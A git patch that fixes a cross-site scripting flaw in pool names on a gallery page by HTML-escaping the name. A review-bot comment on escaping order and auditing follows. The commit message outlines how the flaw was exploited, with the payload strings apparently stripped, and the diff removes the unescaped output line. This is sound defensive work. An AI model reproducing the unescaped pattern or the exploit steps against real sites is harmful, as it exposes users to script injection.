From 22c624c356c02f738702150f9ae837364085727b Mon Sep 17 00:00:00 2001
From: evazion
Date: Tue, 30 Sep 2014 03:04:48 -0500
Subject: [PATCH] Fix XSS in pool names in /pools/gallery page. 1) Set a pool name to ''. 2) Wait for people to view it in /pools/gallery. At first glance the fact that the pool name is truncated to 80 chars appears to limit how much can be done in the exploit. This poses no problem though, since someone could inject '' instead.
---
app/presenters/post_presenter.rb | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/app/presenters/post_presenter.rb b/app/presenters/post_presenter.rb
index 23e93a8e7..e64c60803 100644
--- a/app/presenters/post_presenter.rb
+++ b/app/presenters/post_presenter.rb
@@ -27,7 +27,7 @@ class PostPresenter < Presenter
 if options[:pool]
 html << %{

}
 html << %{}
- html << options[:pool].pretty_name.truncate(80)
+ html << h(options[:pool].pretty_name.truncate(80))
 html << %{}
 html << %{

}
 end
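Review bot: The added `h(...)` escapes only the pool name, while the neighbouring `html << %{…}` context lines (whose literal contents are not visible in this extraction) emit the surrounding markup; if any of them interpolate pool attributes such as an id or name into an href or attribute, those need `h` as well, so the rest of the `if options[:pool]` block and the other `html <<` sites in PostPresenter are worth auditing for the same pattern. Escaping after `truncate(80)` is the right order, since escaping first could let truncation cut an entity in half, and a one-line comment `# escape after truncating so an entity is never cut mid-way` would keep a later edit from swapping them. `h` is called here without a visible definition; confirm it resolves to `ERB::Util.html_escape` via the Presenter base class rather than a local helper with weaker escaping. Longer term, building this block with `content_tag`/`link_to` instead of string concatenation would make escaping the default rather than something added per call site.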